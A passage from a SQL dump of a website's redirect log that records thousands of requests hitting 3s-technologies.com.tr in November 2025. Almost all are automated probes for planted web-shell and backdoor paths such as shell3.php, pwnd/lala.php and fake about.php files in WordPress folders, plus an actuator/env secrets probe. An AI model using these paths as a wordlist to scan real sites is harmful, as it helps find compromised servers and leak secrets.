00:00:00',301),(48989,'http://mail.3s-technologies.com.tr/tr/ae.php',NULL,'','',6,0,'2025-11-08 16:14:03','0000-00-00 00:00:00',301),(48990,'http://mail.3s-technologies.com.tr/tr/hd.php',NULL,'','',2,0,'2025-11-08 16:14:09','0000-00-00 00:00:00',301),(48991,'http://mail.3s-technologies.com.tr/tr/getid3s.php',NULL,'','',1,0,'2025-11-08 16:14:10','0000-00-00 00:00:00',301),(48992,'http://mail.3s-technologies.com.tr/tr/alex-cross.php',NULL,'','',1,0,'2025-11-08 16:14:11','0000-00-00 00:00:00',301),(48993,'http://mail.3s-technologies.com.tr/tr/admin-post.php',NULL,'','',2,0,'2025-11-08 16:14:15','0000-00-00 00:00:00',301),(48994,'http://mail.3s-technologies.com.tr/tr/pomo.php',NULL,'','',7,0,'2025-11-08 16:14:16','0000-00-00 00:00:00',301),(48995,'http://mail.3s-technologies.com.tr/tr/coffee.php',NULL,'','',1,0,'2025-11-08 16:14:24','0000-00-00 00:00:00',301),(48996,'http://mail.3s-technologies.com.tr/tr/o.php',NULL,'','',23,0,'2025-11-08 16:14:31','0000-00-00 00:00:00',301),(48997,'http://mail.3s-technologies.com.tr/tr/nh19t66t.php',NULL,'','',1,0,'2025-11-08 16:14:43','0000-00-00 00:00:00',301),(48998,'http://mail.3s-technologies.com.tr/tr/rei.php',NULL,'','',1,0,'2025-11-08 16:14:44','0000-00-00 00:00:00',301),(48999,'http://mail.3s-technologies.com.tr/tr/666.php',NULL,'','',60,0,'2025-11-08 16:14:45','0000-00-00 00:00:00',301),(49000,'http://mail.3s-technologies.com.tr/tr/777.php',NULL,'','',12,0,'2025-11-08 16:14:46','0000-00-00 00:00:00',301),(49001,'http://mail.3s-technologies.com.tr/tr/888.php',NULL,'','',1,0,'2025-11-08 16:14:47','0000-00-00 00:00:00',301),(49002,'http://mail.3s-technologies.com.tr/tr/0%.php',NULL,'','',1,0,'2025-11-08 16:15:09','0000-00-00 00:00:00',301),(49003,'http://mail.3s-technologies.com.tr/tr/xv.php',NULL,'','',19,0,'2025-11-08 16:16:00','0000-00-00 00:00:00',301),(49004,'http://3s-technologies.com.tr/tr/otuz1.php',NULL,'','',7,0,'2025-11-08 22:02:49','0000-00-00 00:00:00',301),(49005,'http://3s-technologies.com.tr/tr/category.tokens.php',NULL,'','',5,0,'2025-11-08 22:03:10','0000-00-00 00:00:00',301),(49006,'http://3s-technologies.com.tr/tr/niil.php',NULL,'','',3,0,'2025-11-09 15:17:00','0000-00-00 00:00:00',301),(49007,'http://3s-technologies.com.tr/tr/nws.php',NULL,'','',1,0,'2025-11-09 15:17:02','0000-00-00 00:00:00',301),(49008,'http://3s-technologies.com.tr/tr/oauth.php',NULL,'','',3,0,'2025-11-09 15:17:04','0000-00-00 00:00:00',301),(49009,'http://3s-technologies.com.tr/tr/ocp.php',NULL,'','',1,0,'2025-11-09 15:17:06','0000-00-00 00:00:00',301),(49010,'http://3s-technologies.com.tr/tr/of.php',NULL,'','',2,0,'2025-11-09 15:17:07','0000-00-00 00:00:00',301),(49011,'http://3s-technologies.com.tr/tr/iinfo.php',NULL,'','',3,0,'2025-11-09 15:17:20','0000-00-00 00:00:00',301),(49012,'http://3s-technologies.com.tr/tr/ilusi.php',NULL,'','',1,0,'2025-11-09 15:17:21','0000-00-00 00:00:00',301),(49013,'http://3s-technologies.com.tr/tr/php1.php',NULL,'','',1,0,'2025-11-09 15:17:23','0000-00-00 00:00:00',301),(49014,'http://3s-technologies.com.tr/tr/php2.php',NULL,'','',1,0,'2025-11-09 15:17:24','0000-00-00 00:00:00',301),(49015,'http://3s-technologies.com.tr/tr/php3.php',NULL,'','',2,0,'2025-11-09 15:17:25','0000-00-00 00:00:00',301),(49016,'http://3s-technologies.com.tr/tr/php4.php',NULL,'','',1,0,'2025-11-09 15:17:26','0000-00-00 00:00:00',301),(49017,'http://3s-technologies.com.tr/tr/php5.php',NULL,'','',2,0,'2025-11-09 15:17:27','0000-00-00 00:00:00',301),(49018,'http://3s-technologies.com.tr/tr/php7.php',NULL,'','',2,0,'2025-11-09 15:17:28','0000-00-00 00:00:00',301),(49019,'http://3s-technologies.com.tr/tr/xcv.php',NULL,'','',1,0,'2025-11-09 15:17:31','0000-00-00 00:00:00',301),(49020,'http://3s-technologies.com.tr/tr/xdebug.php',NULL,'','',1,0,'2025-11-09 15:17:32','0000-00-00 00:00:00',301),(49021,'http://3s-technologies.com.tr/tr/xdmah.php',NULL,'','',1,0,'2025-11-09 15:17:33','0000-00-00 00:00:00',301),(49022,'http://3s-technologies.com.tr/tr/zk.php',NULL,'','',2,0,'2025-11-09 15:17:34','0000-00-00 00:00:00',301),(49023,'http://3s-technologies.com.tr/tr/zmfm.php',NULL,'','',2,0,'2025-11-09 15:17:35','0000-00-00 00:00:00',301),(49024,'http://3s-technologies.com.tr/tr/zs.php',NULL,'','',2,0,'2025-11-09 15:17:36','0000-00-00 00:00:00',301),(49025,'http://3s-technologies.com.tr/tr/zx.php',NULL,'','',1,0,'2025-11-09 15:17:38','0000-00-00 00:00:00',301),(49026,'http://3s-technologies.com.tr/tr/inc/dnd-upload-cf7.php',NULL,'http://3s-technologies.com.tr/inc/dnd-upload-cf7.php','',1,0,'2025-11-09 15:37:48','0000-00-00 00:00:00',301),(49027,'http://3s-technologies.com.tr/tr/wp-content/plugins/acf-theme-code-pro/acf_theme_code_pro.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/acf-theme-code-pro/acf_theme_code_pro.php','',1,0,'2025-11-09 15:37:49','0000-00-00 00:00:00',301),(49028,'http://3s-technologies.com.tr/tr/wp-zx.php',NULL,'http://3s-technologies.com.tr/wp-zx.php','',6,0,'2025-11-09 15:37:50','0000-00-00 00:00:00',301),(49029,'http://3s-technologies.com.tr/tr/wp-admin/okxob.php',NULL,'http://3s-technologies.com.tr/wp-admin/Okxob.php','',1,0,'2025-11-09 15:37:51','0000-00-00 00:00:00',301),(49030,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/sanskrit.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/blue/Sanskrit.php','',1,0,'2025-11-09 15:37:52','0000-00-00 00:00:00',301),(49031,'http://3s-technologies.com.tr/tr/shell3.php',NULL,'http://3s-technologies.com.tr/shell3.php','',1,0,'2025-11-09 15:37:54','0000-00-00 00:00:00',301),(49032,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/directionality/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/plugins/directionality/index.php','',1,0,'2025-11-09 15:37:55','0000-00-00 00:00:00',301),(49033,'http://3s-technologies.com.tr/tr/wp-admin/habhan.php',NULL,'http://3s-technologies.com.tr/wp-admin/habhan.php','',1,0,'2025-11-09 15:37:57','0000-00-00 00:00:00',301),(49034,'http://3s-technologies.com.tr/tr/wp-includes/images/media/admin.php',NULL,'http://3s-technologies.com.tr/wp-includes/images/media/admin.php','',1,0,'2025-11-09 15:37:58','0000-00-00 00:00:00',301),(49035,'http://3s-technologies.com.tr/tr/wp-term.php',NULL,'http://3s-technologies.com.tr/wp-term.php','',1,0,'2025-11-09 15:38:01','0000-00-00 00:00:00',301),(49036,'http://3s-technologies.com.tr/tr/wp-admin/link-encryption.php',NULL,'http://3s-technologies.com.tr/wp-admin/link-encryption.php','',1,0,'2025-11-09 15:38:02','0000-00-00 00:00:00',301),(49037,'http://3s-technologies.com.tr/tr/wp-content/plugins/advanced-product-fields-for-woocommerce/db.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/advanced-product-fields-for-woocommerce/db.php','',2,0,'2025-11-09 15:38:03','0000-00-00 00:00:00',301),(49038,'http://3s-technologies.com.tr/tr/wp-includes/nekocing.php',NULL,'http://3s-technologies.com.tr/wp-includes/nekocing.php','',1,0,'2025-11-09 15:38:04','0000-00-00 00:00:00',301),(49039,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-community-events-list.php',NULL,'http://3s-technologies.com.tr/wp-admin/includes/class-wp-community-events-list.php','',1,0,'2025-11-09 15:38:05','0000-00-00 00:00:00',301),(49040,'http://3s-technologies.com.tr/tr/wp-admin/link-manager-first.php',NULL,'http://3s-technologies.com.tr/wp-admin/link-manager-first.php','',1,0,'2025-11-09 15:38:06','0000-00-00 00:00:00',301),(49041,'http://3s-technologies.com.tr/tr/wp-admin/themes-pointer.php',NULL,'http://3s-technologies.com.tr/wp-admin/themes-pointer.php','',1,0,'2025-11-09 15:38:07','0000-00-00 00:00:00',301),(49042,'http://3s-technologies.com.tr/tr/wp-admin/network/theme-install-session.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/theme-install-session.php','',1,0,'2025-11-09 15:38:08','0000-00-00 00:00:00',301),(49043,'http://3s-technologies.com.tr/tr/wp-includes/revision-beta.php',NULL,'http://3s-technologies.com.tr/wp-includes/revision-beta.php','',1,0,'2025-11-09 15:38:09','0000-00-00 00:00:00',301),(49044,'http://3s-technologies.com.tr/tr/wp-includes/id3/getid3.lib-repository.php',NULL,'http://3s-technologies.com.tr/wp-includes/ID3/getid3.lib-repository.php','',1,0,'2025-11-09 15:38:11','0000-00-00 00:00:00',301),(49045,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-date-query-request.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-wp-date-query-request.php','',1,0,'2025-11-09 15:38:12','0000-00-00 00:00:00',301),(49046,'http://3s-technologies.com.tr/tr/wp-includes/theme-templates-sample.php',NULL,'http://3s-technologies.com.tr/wp-includes/theme-templates-sample.php','',1,0,'2025-11-09 15:38:13','0000-00-00 00:00:00',301),(49047,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/lala.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/pwnd/lala.php','',1,0,'2025-11-09 15:38:16','0000-00-00 00:00:00',301),(49048,'http://3s-technologies.com.tr/tr/wp-content/plugins/so-pinyin-slugs/inc/main_json.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/so-pinyin-slugs/inc/main_json.php','',3,0,'2025-11-09 15:38:17','0000-00-00 00:00:00',301),(49049,'http://3s-technologies.com.tr/tr/generator/assets/css/css_json.php',NULL,'http://3s-technologies.com.tr/generator/assets/css/css_json.php','',1,0,'2025-11-09 15:38:18','0000-00-00 00:00:00',301),(49050,'http://3s-technologies.com.tr/tr/wp-content/themes/theme-check/main.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/theme-check/main.php','',3,0,'2025-11-09 15:38:20','0000-00-00 00:00:00',301),(49051,'http://3s-technologies.com.tr/tr/wp-content/themes/theme-check/theme-check.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/theme-check/theme-check.php','',2,0,'2025-11-09 15:38:21','0000-00-00 00:00:00',301),(49052,'http://3s-technologies.com.tr/tr/wp-content/themes/covr-wpcom/assets/fonts/manrope.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/covr-wpcom/assets/fonts/manrope.php','',1,0,'2025-11-09 15:38:22','0000-00-00 00:00:00',301),(49053,'http://3s-technologies.com.tr/tr/wp-content/plugins/down.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/down.php','',1,0,'2025-11-09 15:38:23','0000-00-00 00:00:00',301),(49054,'http://3s-technologies.com.tr/tr/wp-admin/user/wp-conflg.php',NULL,'http://3s-technologies.com.tr/wp-admin/user/wp-conflg.php','',1,0,'2025-11-09 15:38:26','0000-00-00 00:00:00',301),(49055,'http://3s-technologies.com.tr/tr/wp-includes/blocks/latest-comments/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/latest-comments/about.php','',1,0,'2025-11-09 15:38:27','0000-00-00 00:00:00',301),(49056,'http://3s-technologies.com.tr/tr/wp-includes/blocks/comments/admin.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/comments/admin.php','',1,0,'2025-11-09 15:38:28','0000-00-00 00:00:00',301),(49057,'http://3s-technologies.com.tr/tr/wp-includes/blocks/pattern/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/pattern/about.php','',1,0,'2025-11-09 15:38:29','0000-00-00 00:00:00',301),(49058,'http://3s-technologies.com.tr/tr/wp-includes/chosen.php',NULL,'http://3s-technologies.com.tr/wp-includes/chosen.php','',1,0,'2025-11-09 15:38:30','0000-00-00 00:00:00',301),(49059,'http://3s-technologies.com.tr/tr/wp-includes/widgets/chosen.php',NULL,'http://3s-technologies.com.tr/wp-includes/widgets/chosen.php','',3,0,'2025-11-09 15:38:32','0000-00-00 00:00:00',301),(49060,'http://3s-technologies.com.tr/tr/wp-content/themes/exnova/wp-file.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/exnova/wp-file.php','',1,0,'2025-11-09 15:38:34','0000-00-00 00:00:00',301),(49061,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/ccp.php',NULL,'http://3s-technologies.com.tr/wp-includes/css/dist/ccp.php','',1,0,'2025-11-09 15:38:35','0000-00-00 00:00:00',301),(49062,'http://3s-technologies.com.tr/tr/wp-includes/blocks/gallery/default.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/gallery/default.php','',1,0,'2025-11-09 15:38:36','0000-00-00 00:00:00',301),(49063,'http://3s-technologies.com.tr/tr/wpcontent/themes/twentytwentytwo/templates/autoload_classmap.php',NULL,'http://3s-technologies.com.tr/wpcontent/themes/twentytwentytwo/templates/autoload_classmap.php','',1,0,'2025-11-09 15:38:38','0000-00-00 00:00:00',301),(49064,'http://3s-technologies.com.tr/tr/wp-content/languages/admin.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/admin.php','',1,0,'2025-11-09 15:38:39','0000-00-00 00:00:00',301),(49065,'http://3s-technologies.com.tr/tr/wp-includes/fiz23.php',NULL,'http://3s-technologies.com.tr/wp-includes/fiz23.php','',1,0,'2025-11-09 15:38:40','0000-00-00 00:00:00',301),(49066,'http://3s-technologies.com.tr/tr/wp-admin/fiz23.php',NULL,'http://3s-technologies.com.tr/wp-admin/fiz23.php','',1,0,'2025-11-09 15:38:42','0000-00-00 00:00:00',301),(49067,'http://3s-technologies.com.tr/tr/wp-singup-login.php',NULL,'http://3s-technologies.com.tr/wp-singup-login.php','',1,0,'2025-11-09 15:38:43','0000-00-00 00:00:00',301),(49068,'http://3s-technologies.com.tr/tr/wp-admin/includes/nav-menu-get.php',NULL,'http://3s-technologies.com.tr/wp-admin/includes/nav-menu-get.php','',1,0,'2025-11-09 15:38:45','0000-00-00 00:00:00',301),(49069,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-customize-widgets-first.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-wp-customize-widgets-first.php','',1,0,'2025-11-09 15:38:46','0000-00-00 00:00:00',301),(49070,'http://3s-technologies.com.tr/tr/wp-content/admin-header.php',NULL,'http://3s-technologies.com.tr/wp-content/admin-header.php','',7,0,'2025-11-09 15:38:48','0000-00-00 00:00:00',301),(49071,'http://3s-technologies.com.tr/tr/wp-content/o.php',NULL,'http://3s-technologies.com.tr/wp-content/O.php','',1,0,'2025-11-09 15:38:51','0000-00-00 00:00:00',301),(49072,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core/base64/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/sodium_compat/src/Core/Base64/about.php','',1,0,'2025-11-09 15:38:52','0000-00-00 00:00:00',301),(49073,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core32/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/sodium_compat/src/Core32/about.php','',1,0,'2025-11-09 15:38:53','0000-00-00 00:00:00',301),(49074,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/chosen.php',NULL,'http://3s-technologies.com.tr/wp-includes/PHPMailer/chosen.php','',1,0,'2025-11-09 15:38:54','0000-00-00 00:00:00',301),(49075,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/wptextpattern/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/plugins/wptextpattern/about.php','',1,0,'2025-11-09 15:38:57','0000-00-00 00:00:00',301),(49076,'http://3s-technologies.com.tr/tr/wp-includes/js/plupload/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/plupload/about.php','',1,0,'2025-11-09 15:38:58','0000-00-00 00:00:00',301),(49077,'http://3s-technologies.com.tr/tr/wp-includes/blocks/read-more/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/read-more/about.php','',1,0,'2025-11-09 15:39:00','0000-00-00 00:00:00',301),(49078,'http://3s-technologies.com.tr/tr/wp-includes/blocks/page-list/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/page-list/about.php','',1,0,'2025-11-09 15:39:01','0000-00-00 00:00:00',301),(49079,'http://3s-technologies.com.tr/tr/wp-includes/blocks/details/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/details/about.php','',1,0,'2025-11-09 15:39:03','0000-00-00 00:00:00',301),(49080,'http://3s-technologies.com.tr/tr/wp-includes/blocks/social-link/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/social-link/about.php','',1,0,'2025-11-09 15:39:04','0000-00-00 00:00:00',301),(49081,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/block-editor/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/css/dist/block-editor/about.php','',1,0,'2025-11-09 15:39:07','0000-00-00 00:00:00',301),(49082,'http://3s-technologies.com.tr/tr/wp-conflg/function.php',NULL,'http://3s-technologies.com.tr/wp-conflg/function.php','',1,0,'2025-11-09 15:39:10','0000-00-00 00:00:00',301),(49083,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyone/template-parts/post/about.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentyone/template-parts/post/about.php','',1,0,'2025-11-09 15:39:14','0000-00-00 00:00:00',301),(49084,'http://3s-technologies.com.tr/tr/wp-content/themes/rimini-new/inc/shop/about.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/rimini-new/inc/shop/about.php','',1,0,'2025-11-09 15:39:16','0000-00-00 00:00:00',301),(49085,'http://3s-technologies.com.tr/tr/wp-content/themes/rimini-new/inc/plugins/about.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/rimini-new/inc/plugins/about.php','',1,0,'2025-11-09 15:39:17','0000-00-00 00:00:00',301),(49086,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/customize-widgets/base64.php',NULL,'http://3s-technologies.com.tr/wp-includes/css/dist/customize-widgets/base64.php','',1,0,'2025-11-09 15:39:18','0000-00-00 00:00:00',301),(49087,'http://3s-technologies.com.tr/tr/wp-includes/js/imgareaselect/colors/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/imgareaselect/colors/index.php','',1,0,'2025-11-09 15:39:19','0000-00-00 00:00:00',301),(49088,'http://3s-technologies.com.tr/tr/wp-includes/requests/src/views/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/Requests/src/views/index.php','',1,0,'2025-11-09 15:39:20','0000-00-00 00:00:00',301),(49089,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/constant-contact/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/Text/Diff/Engine/constant-contact/index.php','',1,0,'2025-11-09 15:39:21','0000-00-00 00:00:00',301),(49090,'http://3s-technologies.com.tr/tr/wp-blog-front.php',NULL,'http://3s-technologies.com.tr/wp-blog-front.php','',6,0,'2025-11-09 15:39:23','0000-00-00 00:00:00',301),(49091,'http://3s-technologies.com.tr/tr/wp-content/uploads/2025/08/fields/index.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/2025/08/fields/index.php','',1,0,'2025-11-09 15:39:25','0000-00-00 00:00:00',301),(49092,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/inc/imgareaselect/index.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwenty/inc/imgareaselect/index.php','',1,0,'2025-11-09 15:39:26','0000-00-00 00:00:00',301),(49093,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/mu-plugins/index.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/blue/mu-plugins/index.php','',1,0,'2025-11-09 15:39:27','0000-00-00 00:00:00',301),(49094,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/chosen.php',NULL,'http://3s-technologies.com.tr/wp-includes/block-patterns/chosen.php','',1,0,'2025-11-09 15:39:29','0000-00-00 00:00:00',301),(49095,'http://3s-technologies.com.tr/tr/wp-admin/adout.php',NULL,'http://3s-technologies.com.tr/wp-admin/adout.php','',1,0,'2025-11-09 15:39:33','0000-00-00 00:00:00',301),(49096,'http://3s-technologies.com.tr/tr/wp-admin/m.php',NULL,'http://3s-technologies.com.tr/wp-admin/m.php','',1,0,'2025-11-09 15:39:35','0000-00-00 00:00:00',301),(49097,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/template-parts/footer/index.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentynineteen/template-parts/footer/index.php','',1,0,'2025-11-09 15:39:36','0000-00-00 00:00:00',301),(49098,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/assets/fonts/source-serif-pro/index.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentytwo/assets/fonts/source-serif-pro/index.php','',1,0,'2025-11-09 15:39:37','0000-00-00 00:00:00',301),(49099,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyone/assets/sass/04-elements/index.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentyone/assets/sass/04-elements/index.php','',1,0,'2025-11-09 15:39:38','0000-00-00 00:00:00',301),(49100,'http://3s-technologies.com.tr/tr/wp-includes/blocks/comment-content/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/comment-content/index.php','',1,0,'2025-11-09 15:39:39','0000-00-00 00:00:00',301),(49101,'http://3s-technologies.com.tr/tr/nextscan2.php',NULL,'http://3s-technologies.com.tr/nextscan2.php','',1,0,'2025-11-09 15:39:40','0000-00-00 00:00:00',301),(49102,'http://3s-technologies.com.tr/tr/wp-content/languages/themes/vendor/index.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/themes/vendor/index.php','',1,0,'2025-11-09 15:39:41','0000-00-00 00:00:00',301),(49103,'http://3s-technologies.com.tr/tr/wp-admin/maint/just2.php',NULL,'http://3s-technologies.com.tr/wp-admin/maint/just2.php','',1,0,'2025-11-09 15:39:43','0000-00-00 00:00:00',301),(49104,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/namespaced/core/curve25519/widgets/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/sodium_compat/namespaced/Core/Curve25519/widgets/index.php','',1,0,'2025-11-09 15:39:44','0000-00-00 00:00:00',301),(49105,'http://3s-technologies.com.tr/tr/wp-content/themes/olsen-light/404.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/olsen-light/404.php','',1,0,'2025-11-09 15:39:45','0000-00-00 00:00:00',301),(49106,'http://3s-technologies.com.tr/tr/wp-includes/blocks/navigation/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/navigation/index.php','',1,0,'2025-11-09 15:39:46','0000-00-00 00:00:00',301),(49107,'http://3s-technologies.com.tr/tr/wp-includes/blocks/post-navigation-link/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/post-navigation-link/index.php','',1,0,'2025-11-09 15:39:47','0000-00-00 00:00:00',301),(49108,'http://3s-technologies.com.tr/tr/wp-admin/js/geckos.php',NULL,'http://3s-technologies.com.tr/wp-admin/js/geckos.php','',1,0,'2025-11-09 15:39:48','0000-00-00 00:00:00',301),(49109,'http://3s-technologies.com.tr/tr/wp-content/languages/plugins/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/plugins/wp-login.php','',1,0,'2025-11-09 15:39:52','0000-00-00 00:00:00',301),(49110,'http://3s-technologies.com.tr/tr/wp-content/languages/plugins/about.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/plugins/about.php','',1,0,'2025-11-09 15:39:53','0000-00-00 00:00:00',301),(49111,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfive/assets/fonts/beiruti/index.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentyfive/assets/fonts/beiruti/index.php','',1,0,'2025-11-09 15:39:54','0000-00-00 00:00:00',301),(49112,'http://3s-technologies.com.tr/tr/wp-content/plugins/jet-elements/includes/modules/jet-dashboard/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/jet-elements/includes/modules/jet-dashboard/wp-login.php','',1,0,'2025-11-09 15:39:55','0000-00-00 00:00:00',301),(49113,'http://3s-technologies.com.tr/tr/wp-content/plugins/loco-translate/tpl/admin/index.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/loco-translate/tpl/admin/index.php','',1,0,'2025-11-09 15:39:56','0000-00-00 00:00:00',301),(49114,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-mail-smtp/about.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-mail-smtp/about.php','',1,0,'2025-11-09 15:39:58','0000-00-00 00:00:00',301),(49115,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/src/parse/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/SimplePie/src/Parse/index.php','',1,0,'2025-11-09 15:40:00','0000-00-00 00:00:00',301),(49116,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/library/simplepie/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/SimplePie/library/SimplePie/index.php','',1,0,'2025-11-09 15:40:01','0000-00-00 00:00:00',301),(49117,'http://3s-technologies.com.tr/tr/wp-includes/blocks/navigation-link/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/navigation-link/index.php','',1,0,'2025-11-09 15:40:02','0000-00-00 00:00:00',301),(49118,'http://3s-technologies.com.tr/tr/wp-includes/blocks/comment-content/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/comment-content/about.php','',1,0,'2025-11-09 15:40:03','0000-00-00 00:00:00',301),(49119,'http://3s-technologies.com.tr/tr/wp-includes/blocks/calendar/about.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/calendar/about.php','',1,0,'2025-11-09 15:40:06','0000-00-00 00:00:00',301),(49120,'http://3s-technologies.com.tr/tr/wp-includes/blocks/post-template/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/blocks/post-template/index.php','',1,0,'2025-11-09 15:40:07','0000-00-00 00:00:00',301),(49121,'http://3s-technologies.com.tr/tr/wp-includes/js/dist/development/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/dist/development/index.php','',1,0,'2025-11-09 15:40:09','0000-00-00 00:00:00',301),(49122,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/colorpicker/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/plugins/colorpicker/index.php','',1,0,'2025-11-09 15:40:10','0000-00-00 00:00:00',301),(49123,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/wpgallery/index.php',NULL,'http://3s-technologies.com.tr/wp-includes/js/tinymce/plugins/wpgallery/index.php','',1,0,'2025-11-09 15:40:12','0000-00-00 00:00:00',301),(49124,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/wp.php',NULL,'http://3s-technologies.com.tr/wp-includes/Text/Diff/Engine/wp.php','',1,0,'2025-11-09 15:40:13','0000-00-00 00:00:00',301),(49125,'https://3s-technologies.com.tr/tr/api/actuator/env',NULL,'https://3s-technologies.com.tr/api/actuator/env','',2,0,'2025-11-09 23:58:33','0000-00-00 00:00:00',301),(49126,'http://mail.3s-technologies.com.tr/tr/ze.php',NULL,'','',17,0,'2025-11-10 10:00:56','0000-00-00 00:00:00',301),(49127,'http://mail.3s-technologies.com.tr/tr/wp-the1me.php',NULL,'','',7,0,'2025-11-10 10:00:58','0000-00-00 00:00:00',301),(49128,'http://mail.3s-technologies.com.tr/tr/dd1.php',NULL,'','',2,0,'2025-11-10 10:01:00','0000-00-00 00:00:00',301),(49129,'http://mail.3s-technologies.com.tr/tr/conn.php',NULL,'','',2,0,'2025-11-10 10:01:00','0000-00-00 00:00:00',301),(49130,'http://mail.3s-technologies.com.tr/tr/kki.php',NULL,'','',2,0,'2025-11-10 10:01:03','0000-00-00 00:00:00',301),(49131,'http://mail.3s-technologies.com.tr/tr/view.php',NULL,'','',10,0,'2025-11-10 10:01:05','0000-00-00 00:00:00',301),(49132,'http://mail.3s-technologies.com.tr/tr/sid3.php',NULL,'','',46,0,'2025-11-10 10:01:06','0000-00-00 00:00:00',301),(49133,'http://mail.3s-technologies.com.tr/tr/mans.php',NULL,'','',16,0,'2025-11-10 10:01:07','0000-00-00 00:00:00',301),(49134,'http://mail.3s-technologies.com.tr/tr/habhan.php',NULL,'','',3,0,'2025-11-10 10:01:12','0000-00-00 00:00:00',301),(49135,'http://mail.3s-technologies.com.tr/tr/bi1f.php',NULL,'','',2,0,'2025-11-10 10:01:13','0000-00-00 00:00:00',301),(49136,'http://mail.3s-technologies.com.tr/tr/lib.php',NULL,'','',66,0,'2025-11-10 10:01:14','0000-00-00 00:00:00',301),(49137,'http://mail.3s-technologies.com.tr/tr/luxe.php',NULL,'','',11,0,'2025-11-10 10:01:14','0000-00-00 00:00:00',301),(49138,'http://mail.3s-technologies.com.tr/tr/an7.php',NULL,'','',26,0,'2025-11-10 10:01:16','0000-00-00 00:00:00',301),(49139,'http://mail.3s-technologies.com.tr/tr/fs7.php',NULL,'','',7,0,'2025-11-10 10:01:17','0000-00-00 00:00:00',301),(49140,'http://mail.3s-technologies.com.tr/tr/icon.php',NULL,'','',2,0,'2025-11-10 10:01:18','0000-00-00 